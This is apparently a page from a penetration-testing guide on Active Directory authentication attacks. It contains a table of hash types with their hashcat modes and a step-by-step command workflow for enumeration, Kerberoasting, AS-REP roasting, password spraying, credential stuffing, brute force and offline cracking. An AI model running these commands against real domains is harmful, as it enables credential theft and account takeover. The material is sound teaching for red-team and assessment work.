This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Authentication Attacks

Important: It's important to understand the environment before launching any attacks, bringing down a critical service could cause major issues for the organization (and for you). 😅

Hash Types in Active Directory Environments

Hash Type Reference Table

Hash Type
Hashcat Mode
Format Example
Source/Extraction
Primary Use Case

NTLM

1000

31d6cfe0d16ae931b73c59d7e0c089c0

secretsdump, SAM/NTDS

Pass-the-hash, local authentication

NTLMv2

5600

user::domain:challenge:response:blob

Network capture, Responder

Challenge-response auth, credential theft

Kerberos TGS

13100

$krb5tgs$23$*user$DOMAIN$service*$hash

Kerberoasting attacks

Service account password recovery

AS-REP

18200

$krb5asrep$23$user@DOMAIN:hash

AS-REP roasting

User accounts without pre-auth

NTLM Hash (Mode 1000)

Purpose: Legacy Windows password hash stored in SAM database and NTDS.dit

Structure: MD4 hash of the Unicode password (32 hexadecimal characters)

Weakness: Fast to crack due to weak hashing algorithm, no salt

Attack Value: Enables pass-the-hash attacks without knowing plaintext password

NTLMv2 Hash (Mode 5600)

Purpose: Challenge-response authentication hash for network protocols

Structure: HMAC-MD5 of username, domain, server challenge, and client response

Weakness: Can be captured through LLMNR/NBT-NS poisoning or man-in-the-middle attacks

Attack Value: Provides cleartext password when cracked, works across network authentication

Kerberos TGS Hash (Mode 13100)

Purpose: Service ticket encrypted with service account password

Structure: Kerberos ticket encrypted using RC4-HMAC or AES encryption

Weakness: Service accounts often have weak passwords and don't change frequently

Attack Value: Service accounts typically have elevated privileges for applications/databases

AS-REP Hash (Mode 18200)

Purpose: Authentication Server response for accounts without Kerberos pre-authentication

Structure: Encrypted timestamp using user's password hash

Weakness: Accounts configured with "Do not require Kerberos pre-authentication"

Attack Value: Direct user account compromise, often legacy compatibility setting

Integrated Attack Workflow

Comprehensive Authentication Assessment

# Step 1: Reconnaissance
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users > users.txt

# Step 2: Service Account Targeting
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile kerberoast.txt
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile asrep.txt

# Step 3: Password Spraying
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success

# Step 4: Credential Stuffing (if breach data available)
crackmapexec smb <DC-IP> -u breach_users.txt -p breach_passwords.txt --no-bruteforce --continue-on-success

# Step 5: Targeted Brute Force
crackmapexec smb <DC-IP> -u 'administrator' -p admin_passwords.txt --continue-on-success

# Step 6: Offline Cracking
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
PreviousActive Directory EnumerationNextNon-Authenticated (External) Attacks

Last updated

Was this helpful?